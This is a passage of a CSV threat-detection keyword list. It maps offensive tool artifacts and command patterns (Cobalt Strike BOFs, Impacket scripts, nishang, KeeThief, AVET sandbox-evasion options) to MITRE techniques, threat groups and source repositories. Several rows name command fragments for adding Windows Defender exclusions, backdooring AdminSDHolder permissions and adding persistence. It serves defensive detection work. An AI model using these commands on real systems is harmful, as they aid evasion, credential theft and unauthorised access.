TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adcs_enum.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com2.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*adcsattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*adcskiller.py*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*ADCSPwn.csproj*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*ADCSPwn.exe*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*ADCSPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADCSPwn.sln*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*ADCSPwn-master*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*add_evasion check_fast_forwarding*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion computation_fibonacci *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion computation_timed_fibonacci*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion evasion_by_sleep *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion fopen_sandbox_evasion*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_bios_info*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_computer_domain *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_cpu_cores *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_install_date *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_num_processes*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_standard_browser *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_tickcount*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion gethostbyname_sandbox_evasion*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_background_wp*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_folder *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_network_drive*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_public_desktop*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_recent_files*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_recycle_bin*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_username *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_vm_mac*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_vm_regkey*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion hide_console*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion interaction_getchar*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion interaction_system_pause*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion is_debugger_present*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion sleep_by_ping *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*Add_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*addcomputer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Add-ConstrainedDelegationBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Add-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Add-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*AddKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*AddKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Add-MpPreference -ExclusionPath *","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*","greyware_tool_keyword","powershell","Exclude powershell from defender detections","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","1","15","2","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z" +"*Add-Persistence *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Add-Persistence*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Add-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*addpriv SeloadDrivePrivilege*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Add-PSFirewallRules*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the 